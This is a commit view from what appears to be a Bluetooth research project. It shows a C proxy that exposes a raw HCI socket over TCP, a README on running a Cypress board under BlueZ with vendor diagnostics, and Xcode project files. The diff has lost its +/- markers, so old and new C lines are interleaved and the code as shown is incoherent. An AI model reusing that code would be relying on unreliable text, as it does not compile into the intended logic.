if (x > 0) {
if (FD_ISSET(client, &R)) {
n = read(client, client_buf+client_out, 1024-client_out);
if (n > 0) {
client_out += n;
} else {
close(client);
printf("Client read failed\n");
return;
}
n = read(client, client_buf, 4096);
if (n > 0) {
write(bt, client_buf, n);
} else {
close(client);
printf("[!] Client read failed\n");
return;
}
}
if (FD_ISSET(bt, &R)) {
n = read(bt, bt_buf+bt_out, 1024-bt_out);
if (n > 0) {
bt_out += n;
} else {
close(client);
printf("BT read failed\n");
return;
}
n = read(bt, bt_buf, 4096);
if (n > 0) {
write(client, bt_buf, n);
} else {
close(client);
printf("[!] H4 socket read failed\n");
return;
}
}
} else if (x < 0 && errno != EINTR){
printf("Select failed with %s\n", strerror(errno));
printf("[!] Select failed with %s\n", strerror(errno));
close(client);
return;
}
@@ -250,32 +225,36 @@ int main(int argc, char **argv) {
port = atoi(argv[1]);
// wake BT device
btwake_fd = open("/dev/btwake", 0);
while (1) {
// wake BT device
btwake_fd = open("/dev/btwake", 0);
bt_fd = connect_bt_device();
if (bt_fd < 0) {
printf("[!] Error connecting to bluetooth device\n");
return -1;
}
server_fd = create_server(port);
if (server_fd < 0) {
printf("[!] Unable to create proxy server\n");
return -1;
}
printf("[*] Created proxy server\n");
signal(SIGINT, __exit);
bt_fd = connect_bt_device();
if (bt_fd < 0) {
printf("Error connecting to bluetooth device\n");
return -1;
}
server_fd = create_server(port);
if (server_fd < 0) {
printf("Unable to create server\n");
return -1;
}
printf("Created server\n");
signal(SIGINT, __exit);
while (1) {
printf("Waiting for connection\n");
printf("[*] Waiting for remote connection\n");
client_fd = wait_for_connection(server_fd);
if (client_fd < 0)
continue;
// currently only one connection is supported
printf("[!] Unable to connect remote device to proxy\n");
// currently only one connection is supported
proxy_bt_socket(client_fd, bt_fd);
close(client_fd);
close(server_fd);
close(bt_fd);
close(btwake_fd);
}
return 0;
ios-proxy/ios-proxy
BIN
View File
Binary file not shown.
linux_bluez/README.md
+81
View File
@@ -0,0 +1,81 @@
Linux Setup
-----------
The following steps are required to use the CYW20735B1 evaluation kit as normal HCI device on Linux with BlueZ.
**1. Setup as HCI device**
You need to set the baud rate to 3 Mbit/s. Replace `/dev/ttyUSB0` with your device.
btattach -B /dev/ttyUSB0 -S 3000000
If this does not work directly, use:
stty -F /dev/ttyUSB0 3000000
btattach -B /dev/ttyUSB0
Sometimes, you need to plug/unplug the evaluation board multiple times and run a combination of the commands above.
If setup was successful can be checked with `hciconfig`. A MAC address with all zeros indicates that the baud rate
was not set correctly and you need to try again.
**2. Use with BlueZ**
Assuming that you already have a regular Bluetooth device, you new device is `hci1`.
hciconfig hci1 up
You can list your HCI devices:
hcitool dev
**3. Command line tools for connections**
Scanning for devices:
hcitool scan
hcitool lescan
Connections and pairing:
bluetoothctl
Enter into `bluetoothctl` command prompt:
power on
agent on
default-agent
scan on
Optional - accept connections:
advertise on
pairable on
discoverable on
Do a pairing and then connect:
pair aa:bb:cc:dd:ee:ff
connect aa:bb:cc:dd:ee:ff
Diagnostics
-----------
On some devices, diagnostic logging for LMP and LCP already works out of the box.
Note that diagnostics can do more, but the additional features are currently not
integrated into *BlueZ* or the Linux kernel.
To enable diagnostics, execute:
echo 1 > /sys/kernel/debug/bluetooth/hci0/vendor_diag
By default, this entry is only created for Intel and Broadcom chips.
The evaluation board claims to be Cypress, a different vendor ID, thus
the vendor diagnostics are missing.
*BlueZ* already comes with a monitor that decodes some parts of the diagnostic
traffic, simply run:
btmon
macos-framework/IOBluetoothExtended/IOBluetoothExtended.xcodeproj/project.pbxproj
+532
View File
@@ -0,0 +1,532 @@
// !$*UTF8*$!
{
archiveVersion = 1;
classes = {
};
objectVersion = 50;
objects = {
/* Begin PBXBuildFile section */
8C3047E2231D7CAE0003E282 /* HCIDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C3047E1231D7CAE0003E282 /* HCIDelegate.m */; };
8C3047EA231DCDE30003E282 /* HCIDelegate.swift in Sources */ = {isa = PBXBuildFile; fileRef = 8C3047E9231DCDE30003E282 /* HCIDelegate.swift */; };
8C31742A22D1049E004B9604 /* IOBluetoothExtended.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 8C31742022D1049D004B9604 /* IOBluetoothExtended.framework */; };
8C31742F22D1049E004B9604 /* IOBluetoothExtendedTests.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C31742E22D1049E004B9604 /* IOBluetoothExtendedTests.m */; };
8C31743122D1049E004B9604 /* IOBluetoothExtended.h in Headers */ = {isa = PBXBuildFile; fileRef = 8C31742322D1049D004B9604 /* IOBluetoothExtended.h */; settings = {ATTRIBUTES = (Public, ); }; };
8C3174AF22D10E11004B9604 /* HCIDelegate.h in Headers */ = {isa = PBXBuildFile; fileRef = 8C31743A22D104DA004B9604 /* HCIDelegate.h */; settings = {ATTRIBUTES = (Public, ); }; };
8C3174B122D10E4C004B9604 /* IOBluetoothHostController.h in Headers */ = {isa = PBXBuildFile; fileRef = 8C31744122D10516004B9604 /* IOBluetoothHostController.h */; settings = {ATTRIBUTES = (Public, ); }; };
8C57A7432333A6E100037C3D /* HCICommunicator.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C57A7422333A6E100037C3D /* HCICommunicator.m */; };
8C57A7442333A7C400037C3D /* HCICommunicator.h in Headers */ = {isa = PBXBuildFile; fileRef = 8C57A7412333A6D000037C3D /* HCICommunicator.h */; settings = {ATTRIBUTES = (Public, ); }; };
8C72A82823339457001A9806 /* IOBE.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C72A82723339457001A9806 /* IOBE.m */; };
8CE61E5D232AE8D20086419F /* Extensions.swift in Sources */ = {isa = PBXBuildFile; fileRef = 8CE61E5C232AE8D20086419F /* Extensions.swift */; };
/* End PBXBuildFile section */
/* Begin PBXContainerItemProxy section */
8C31742B22D1049E004B9604 /* PBXContainerItemProxy */ = {
isa = PBXContainerItemProxy;
containerPortal = 8C31741722D1049D004B9604 /* Project object */;
proxyType = 1;
remoteGlobalIDString = 8C31741F22D1049D004B9604;
remoteInfo = IOBluetoothExtended;
};
/* End PBXContainerItemProxy section */
/* Begin PBXFileReference section */
8C3047E1231D7CAE0003E282 /* HCIDelegate.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = HCIDelegate.m; sourceTree = "<group>"; };
8C3047E9231DCDE30003E282 /* HCIDelegate.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = HCIDelegate.swift; sourceTree = "<group>"; };
8C31742022D1049D004B9604 /* IOBluetoothExtended.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = IOBluetoothExtended.framework; sourceTree = BUILT_PRODUCTS_DIR; };
8C31742322D1049D004B9604 /* IOBluetoothExtended.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOBluetoothExtended.h; sourceTree = "<group>"; };
8C31742422D1049D004B9604 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
8C31742922D1049E004B9604 /* IOBluetoothExtendedTests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = IOBluetoothExtendedTests.xctest; sourceTree = BUILT_PRODUCTS_DIR; };
8C31742E22D1049E004B9604 /* IOBluetoothExtendedTests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = IOBluetoothExtendedTests.m; sourceTree = "<group>"; };
8C31743022D1049E004B9604 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
8C31743A22D104DA004B9604 /* HCIDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = HCIDelegate.h; sourceTree = "<group>"; };
8C31744122D10516004B9604 /* IOBluetoothHostController.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOBluetoothHostController.h; sourceTree = "<group>"; };
8C57A7412333A6D000037C3D /* HCICommunicator.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = HCICommunicator.h; sourceTree = "<group>"; };
8C57A7422333A6E100037C3D /* HCICommunicator.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = HCICommunicator.m; sourceTree = "<group>"; };
8C72A82723339457001A9806 /* IOBE.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = IOBE.m; sourceTree = "<group>"; };
8C72A8322333A100001A9806 /* IOBE.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOBE.h; sourceTree = "<group>"; };
8CE61E5C232AE8D20086419F /* Extensions.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = Extensions.swift; sourceTree = "<group>"; };
/* End PBXFileReference section */
/* Begin PBXFrameworksBuildPhase section */
8C31741D22D1049D004B9604 /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
8C31742622D1049E004B9604 /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
8C31742A22D1049E004B9604 /* IOBluetoothExtended.framework in Frameworks */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXFrameworksBuildPhase section */
/* Begin PBXGroup section */
8C31741622D1049D004B9604 = {
isa = PBXGroup;
children = (
8C31742222D1049D004B9604 /* IOBluetoothExtended */,
8C31742D22D1049E004B9604 /* IOBluetoothExtendedTests */,
8C31742122D1049D004B9604 /* Products */,
);
sourceTree = "<group>";
};
8C31742122D1049D004B9604 /* Products */ = {
isa = PBXGroup;
children = (
8C31742022D1049D004B9604 /* IOBluetoothExtended.framework */,
8C31742922D1049E004B9604 /* IOBluetoothExtendedTests.xctest */,
);
name = Products;
sourceTree = "<group>";
};
8C31742222D1049D004B9604 /* IOBluetoothExtended */ = {
isa = PBXGroup;
children = (
8C72A82B2333949C001A9806 /* Util */,
8C31742322D1049D004B9604 /* IOBluetoothExtended.h */,
8C31744122D10516004B9604 /* IOBluetoothHostController.h */,
8C72A8322333A100001A9806 /* IOBE.h */,
8C72A82723339457001A9806 /* IOBE.m */,
8C31743A22D104DA004B9604 /* HCIDelegate.h */,
8C3047E1231D7CAE0003E282 /* HCIDelegate.m */,
8C3047E9231DCDE30003E282 /* HCIDelegate.swift */,
8C57A7412333A6D000037C3D /* HCICommunicator.h */,
8C57A7422333A6E100037C3D /* HCICommunicator.m */,
8CE61E5C232AE8D20086419F /* Extensions.swift */,
8C31742422D1049D004B9604 /* Info.plist */,
);
path = IOBluetoothExtended;
sourceTree = "<group>";
};
8C31742D22D1049E004B9604 /* IOBluetoothExtendedTests */ = {
isa = PBXGroup;
children = (
8C31742E22D1049E004B9604 /* IOBluetoothExtendedTests.m */,
8C31743022D1049E004B9604 /* Info.plist */,
);
path = IOBluetoothExtendedTests;
sourceTree = "<group>";
};
8C72A82B2333949C001A9806 /* Util */ = {
isa = PBXGroup;
children = (
);
path = Util;
sourceTree = "<group>";
};
/* End PBXGroup section */
/* Begin PBXHeadersBuildPhase section */
8C31741B22D1049D004B9604 /* Headers */ = {
isa = PBXHeadersBuildPhase;
buildActionMask = 2147483647;
files = (
8C57A7442333A7C400037C3D /* HCICommunicator.h in Headers */,
8C3174AF22D10E11004B9604 /* HCIDelegate.h in Headers */,
8C31743122D1049E004B9604 /* IOBluetoothExtended.h in Headers */,
8C3174B122D10E4C004B9604 /* IOBluetoothHostController.h in Headers */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXHeadersBuildPhase section */
/* Begin PBXNativeTarget section */
8C31741F22D1049D004B9604 /* IOBluetoothExtended */ = {
isa = PBXNativeTarget;
buildConfigurationList = 8C31743422D1049E004B9604 /* Build configuration list for PBXNativeTarget "IOBluetoothExtended" */;
buildPhases = (
8C31741B22D1049D004B9604 /* Headers */,
8C31741C22D1049D004B9604 /* Sources */,
8C31741D22D1049D004B9604 /* Frameworks */,
8C31741E22D1049D004B9604 /* Resources */,
8C5F1E5923605FFF00945944 /* ShellScript */,
);
buildRules = (
);
dependencies = (
);
name = IOBluetoothExtended;
productName = IOBluetoothExtended;
productReference = 8C31742022D1049D004B9604 /* IOBluetoothExtended.framework */;
productType = "com.apple.product-type.framework";
};
8C31742822D1049E004B9604 /* IOBluetoothExtendedTests */ = {
isa = PBXNativeTarget;
buildConfigurationList = 8C31743722D1049E004B9604 /* Build configuration list for PBXNativeTarget "IOBluetoothExtendedTests" */;
buildPhases = (
8C31742522D1049E004B9604 /* Sources */,
8C31742622D1049E004B9604 /* Frameworks */,
8C31742722D1049E004B9604 /* Resources */,
);
buildRules = (
);
dependencies = (
8C31742C22D1049E004B9604 /* PBXTargetDependency */,
);
name = IOBluetoothExtendedTests;
productName = IOBluetoothExtendedTests;
productReference = 8C31742922D1049E004B9604 /* IOBluetoothExtendedTests.xctest */;
productType = "com.apple.product-type.bundle.unit-test";
};
/* End PBXNativeTarget section */
/* Begin PBXProject section */
8C31741722D1049D004B9604 /* Project object */ = {
isa = PBXProject;
attributes = {
LastUpgradeCheck = 1100;
ORGANIZATIONNAME = "Davide Toldo";
TargetAttributes = {
8C31741F22D1049D004B9604 = {
CreatedOnToolsVersion = 10.2.1;
LastSwiftMigration = 1030;
};
8C31742822D1049E004B9604 = {
CreatedOnToolsVersion = 10.2.1;
};
};
};
buildConfigurationList = 8C31741A22D1049D004B9604 /* Build configuration list for PBXProject "IOBluetoothExtended" */;
compatibilityVersion = "Xcode 9.3";
developmentRegion = en;
hasScannedForEncodings = 0;
knownRegions = (
en,
);
mainGroup = 8C31741622D1049D004B9604;
productRefGroup = 8C31742122D1049D004B9604 /* Products */;
projectDirPath = "";
projectRoot = "";
targets = (
8C31741F22D1049D004B9604 /* IOBluetoothExtended */,
8C31742822D1049E004B9604 /* IOBluetoothExtendedTests */,
);
};
/* End PBXProject section */
/* Begin PBXResourcesBuildPhase section */
8C31741E22D1049D004B9604 /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
8C31742722D1049E004B9604 /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXResourcesBuildPhase section */
/* Begin PBXShellScriptBuildPhase section */
8C5F1E5923605FFF00945944 /* ShellScript */ = {
isa = PBXShellScriptBuildPhase;
buildActionMask = 2147483647;
files = (
);
inputFileListPaths = (
);
inputPaths = (
);
outputFileListPaths = (
);
outputPaths = (
);
runOnlyForDeploymentPostprocessing = 0;
shellPath = /bin/sh;
shellScript = "# Type a script or drag a script file from your workspace to insert its path.\ncp -r ${BUILT_PRODUCTS_DIR}/${EXECUTABLE_NAME}.framework ../${EXECUTABLE_NAME}.framework\n";
};
/* End PBXShellScriptBuildPhase section */
/* Begin PBXSourcesBuildPhase section */
8C31741C22D1049D004B9604 /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
8C72A82823339457001A9806 /* IOBE.m in Sources */,
8CE61E5D232AE8D20086419F /* Extensions.swift in Sources */,
8C57A7432333A6E100037C3D /* HCICommunicator.m in Sources */,
8C3047E2231D7CAE0003E282 /* HCIDelegate.m in Sources */,
8C3047EA231DCDE30003E282 /* HCIDelegate.swift in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
8C31742522D1049E004B9604 /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
8C31742F22D1049E004B9604 /* IOBluetoothExtendedTests.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXSourcesBuildPhase section */
/* Begin PBXTargetDependency section */
8C31742C22D1049E004B9604 /* PBXTargetDependency */ = {
isa = PBXTargetDependency;
target = 8C31741F22D1049D004B9604 /* IOBluetoothExtended */;
targetProxy = 8C31742B22D1049E004B9604 /* PBXContainerItemProxy */;
};
/* End PBXTargetDependency section */
/* Begin XCBuildConfiguration section */
8C31743222D1049E004B9604 /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_SEARCH_USER_PATHS = NO;
CLANG_ANALYZER_NONNULL = YES;
CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
CLANG_CXX_LIBRARY = "libc++";
CLANG_ENABLE_MODULES = YES;
CLANG_ENABLE_OBJC_ARC = YES;
CLANG_ENABLE_OBJC_WEAK = YES;
CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
CLANG_WARN_BOOL_CONVERSION = YES;
CLANG_WARN_COMMA = YES;
CLANG_WARN_CONSTANT_CONVERSION = YES;
CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
CLANG_WARN_EMPTY_BODY = YES;
CLANG_WARN_ENUM_CONVERSION = YES;
CLANG_WARN_INFINITE_RECURSION = YES;
CLANG_WARN_INT_CONVERSION = YES;
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
CLANG_WARN_STRICT_PROTOTYPES = YES;
CLANG_WARN_SUSPICIOUS_MOVE = YES;
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
CLANG_WARN_UNREACHABLE_CODE = YES;
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
CODE_SIGN_IDENTITY = "Mac Developer";
COPY_PHASE_STRIP = NO;
CURRENT_PROJECT_VERSION = 1;
DEBUG_INFORMATION_FORMAT = dwarf;
ENABLE_STRICT_OBJC_MSGSEND = YES;
ENABLE_TESTABILITY = YES;
GCC_C_LANGUAGE_STANDARD = gnu11;
GCC_DYNAMIC_NO_PIC = NO;
GCC_NO_COMMON_BLOCKS = YES;
GCC_OPTIMIZATION_LEVEL = 0;
GCC_PREPROCESSOR_DEFINITIONS = (
"DEBUG=1",
"$(inherited)",
);
GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
GCC_WARN_UNDECLARED_SELECTOR = YES;
GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
GCC_WARN_UNUSED_FUNCTION = YES;
GCC_WARN_UNUSED_VARIABLE = YES;
MACOSX_DEPLOYMENT_TARGET = 10.14;
MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
MTL_FAST_MATH = YES;
ONLY_ACTIVE_ARCH = YES;
SDKROOT = macosx;
VERSIONING_SYSTEM = "apple-generic";
VERSION_INFO_PREFIX = "";
};
name = Debug;
};
8C31743322D1049E004B9604 /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_SEARCH_USER_PATHS = NO;
CLANG_ANALYZER_NONNULL = YES;
CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
CLANG_CXX_LIBRARY = "libc++";
CLANG_ENABLE_MODULES = YES;
CLANG_ENABLE_OBJC_ARC = YES;
CLANG_ENABLE_OBJC_WEAK = YES;
CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
CLANG_WARN_BOOL_CONVERSION = YES;
CLANG_WARN_COMMA = YES;
CLANG_WARN_CONSTANT_CONVERSION = YES;
CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
CLANG_WARN_EMPTY_BODY = YES;
CLANG_WARN_ENUM_CONVERSION = YES;
CLANG_WARN_INFINITE_RECURSION = YES;
CLANG_WARN_INT_CONVERSION = YES;
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
CLANG_WARN_STRICT_PROTOTYPES = YES;
CLANG_WARN_SUSPICIOUS_MOVE = YES;
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
CLANG_WARN_UNREACHABLE_CODE = YES;
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
CODE_SIGN_IDENTITY = "Mac Developer";
COPY_PHASE_STRIP = NO;
CURRENT_PROJECT_VERSION = 1;
DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
ENABLE_NS_ASSERTIONS = NO;
ENABLE_STRICT_OBJC_MSGSEND = YES;
GCC_C_LANGUAGE_STANDARD = gnu11;
GCC_NO_COMMON_BLOCKS = YES;
GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
GCC_WARN_UNDECLARED_SELECTOR = YES;
GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
GCC_WARN_UNUSED_FUNCTION = YES;
GCC_WARN_UNUSED_VARIABLE = YES;
MACOSX_DEPLOYMENT_TARGET = 10.14;
MTL_ENABLE_DEBUG_INFO = NO;
MTL_FAST_MATH = YES;
SDKROOT = macosx;
SWIFT_COMPILATION_MODE = wholemodule;
VERSIONING_SYSTEM = "apple-generic";
VERSION_INFO_PREFIX = "";
};
name = Release;
};
8C31743522D1049E004B9604 /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES = YES;
CLANG_ENABLE_MODULES = YES;
CODE_SIGN_IDENTITY = "";
CODE_SIGN_STYLE = Automatic;
COMBINE_HIDPI_IMAGES = YES;
DEFINES_MODULE = YES;
DEVELOPMENT_TEAM = 27U966V459;
DYLIB_COMPATIBILITY_VERSION = 1;
DYLIB_CURRENT_VERSION = 1;
DYLIB_INSTALL_NAME_BASE = "@rpath";
FRAMEWORK_VERSION = A;
GCC_NO_COMMON_BLOCKS = NO;
INFOPLIST_FILE = IOBluetoothExtended/Info.plist;
INSTALL_PATH = "$(LOCAL_LIBRARY_DIR)/Frameworks";
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/../Frameworks",
"@loader_path/Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = "de.tu-darmstadt.seemoo.IOBluetoothExtended";
PRODUCT_NAME = "$(TARGET_NAME:c99extidentifier)";
SKIP_INSTALL = YES;
SWIFT_OBJC_BRIDGING_HEADER = "";
SWIFT_OBJC_INTERFACE_HEADER_NAME = "IOBluetoothExtended-Swift.h";
SWIFT_OPTIMIZATION_LEVEL = "-Onone";
SWIFT_VERSION = 5.0;
};
name = Debug;
};
8C31743622D1049E004B9604 /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES = YES;
CLANG_ENABLE_MODULES = YES;
CODE_SIGN_IDENTITY = "";
CODE_SIGN_STYLE = Automatic;
COMBINE_HIDPI_IMAGES = YES;
DEFINES_MODULE = YES;
DEVELOPMENT_TEAM = 27U966V459;
DYLIB_COMPATIBILITY_VERSION = 1;
DYLIB_CURRENT_VERSION = 1;
DYLIB_INSTALL_NAME_BASE = "@rpath";
FRAMEWORK_VERSION = A;
GCC_NO_COMMON_BLOCKS = NO;
INFOPLIST_FILE = IOBluetoothExtended/Info.plist;
INSTALL_PATH = "$(LOCAL_LIBRARY_DIR)/Frameworks";
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/../Frameworks",
"@loader_path/Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = "de.tu-darmstadt.seemoo.IOBluetoothExtended";
PRODUCT_NAME = "$(TARGET_NAME:c99extidentifier)";
SKIP_INSTALL = YES;
SWIFT_OBJC_BRIDGING_HEADER = "";
SWIFT_OBJC_INTERFACE_HEADER_NAME = "IOBluetoothExtended-Swift.h";
SWIFT_VERSION = 5.0;
};
name = Release;
};
8C31743822D1049E004B9604 /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
CODE_SIGN_STYLE = Automatic;
COMBINE_HIDPI_IMAGES = YES;
DEVELOPMENT_TEAM = M66VH9B6C7;
INFOPLIST_FILE = IOBluetoothExtendedTests/Info.plist;
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/../Frameworks",
"@loader_path/../Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = com.davidetoldo.IOBluetoothExtendedTests;
PRODUCT_NAME = "$(TARGET_NAME)";
};
name = Debug;
};
8C31743922D1049E004B9604 /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_EMBED_SWIFT_STANDARD_LIBRARIES = YES;
CODE_SIGN_STYLE = Automatic;
COMBINE_HIDPI_IMAGES = YES;
DEVELOPMENT_TEAM = M66VH9B6C7;
INFOPLIST_FILE = IOBluetoothExtendedTests/Info.plist;
LD_RUNPATH_SEARCH_PATHS = (
"$(inherited)",
"@executable_path/../Frameworks",
"@loader_path/../Frameworks",
);
PRODUCT_BUNDLE_IDENTIFIER = com.davidetoldo.IOBluetoothExtendedTests;
PRODUCT_NAME = "$(TARGET_NAME)";
};
name = Release;
};
/* End XCBuildConfiguration section */
/* Begin XCConfigurationList section */
8C31741A22D1049D004B9604 /* Build configuration list for PBXProject "IOBluetoothExtended" */ = {
isa = XCConfigurationList;
buildConfigurations = (
8C31743222D1049E004B9604 /* Debug */,
8C31743322D1049E004B9604 /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
8C31743422D1049E004B9604 /* Build configuration list for PBXNativeTarget "IOBluetoothExtended" */ = {
isa = XCConfigurationList;
buildConfigurations = (
8C31743522D1049E004B9604 /* Debug */,
8C31743622D1049E004B9604 /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
8C31743722D1049E004B9604 /* Build configuration list for PBXNativeTarget "IOBluetoothExtendedTests" */ = {
isa = XCConfigurationList;
buildConfigurations = (
8C31743822D1049E004B9604 /* Debug */,
8C31743922D1049E004B9604 /* Release */,
);
defaultConfigurationIsVisible = 0;
defaultConfigurationName = Release;
};
/* End XCConfigurationList section */
};
rootObject = 8C31741722D1049D004B9604 /* Project object */;
}
macos-framework/IOBluetoothExtended/IOBluetoothExtended.xcodeproj/xcshareddata/xcschemes/IOBluetoothExtended.xcscheme
+77
View File
@@ -0,0 +1,77 @@
<?xml version="1.0" encoding="UTF-8"?>
<Scheme
LastUpgradeVersion = "1110"
version = "1.3">
<BuildAction
parallelizeBuildables = "YES"
buildImplicitDependencies = "YES">
<BuildActionEntries>
<BuildActionEntry
buildForTesting = "YES"
buildForRunning = "YES"
buildForProfiling = "YES"
buildForArchiving = "YES"
buildForAnalyzing = "YES">
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "8C31741F22D1049D004B9604"
BuildableName = "IOBluetoothExtended.framework"
BlueprintName = "IOBluetoothExtended"
ReferencedContainer = "container:IOBluetoothExtended.xcodeproj">
</BuildableReference>
</BuildActionEntry>
</BuildActionEntries>
</BuildAction>
<TestAction
buildConfiguration = "Debug"
selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
shouldUseLaunchSchemeArgsEnv = "YES">
<Testables>
<TestableReference
skipped = "NO">
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "8C31742822D1049E004B9604"
BuildableName = "IOBluetoothExtendedTests.xctest"
BlueprintName = "IOBluetoothExtendedTests"
ReferencedContainer = "container:IOBluetoothExtended.xcodeproj">
</BuildableReference>
</TestableReference>
</Testables>
</TestAction>
<LaunchAction
buildConfiguration = "Debug"
selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB"
selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB"
launchStyle = "0"
useCustomWorkingDirectory = "NO"
ignoresPersistentStateOnLaunch = "NO"
debugDocumentVersioning = "YES"
debugServiceExtension = "internal"
allowLocationSimulation = "YES">
</LaunchAction>
<ProfileAction
buildConfiguration = "Release"
shouldUseLaunchSchemeArgsEnv = "YES"
savedToolIdentifier = ""
useCustomWorkingDirectory = "NO"
debugDocumentVersioning = "YES">
<MacroExpansion>
<BuildableReference
BuildableIdentifier = "primary"
BlueprintIdentifier = "8C31741F22D1049D004B9604"
BuildableName = "IOBluetoothExtended.framework"
BlueprintName = "IOBluetoothExtended"
ReferencedContainer = "container:IOBluetoothExtended.xcodeproj">
</BuildableReference>
</MacroExpansion>
</ProfileAction>
<AnalyzeAction
buildConfiguration = "Debug">
</AnalyzeAction>
<ArchiveAction
buildConfiguration = "Release"
revealArchiveInOrganizer = "YES">
</ArchiveAction>
</Scheme>
macos-framework/IOBluetoothExtended/IOBluetoothExtended/Extensions.swift
+90
View File
@@ -0,0 +1,90 @@
//
// Extensions.swift
// IOBluetoothExtended
//
// Created by Davide Toldo on 12.09.19.
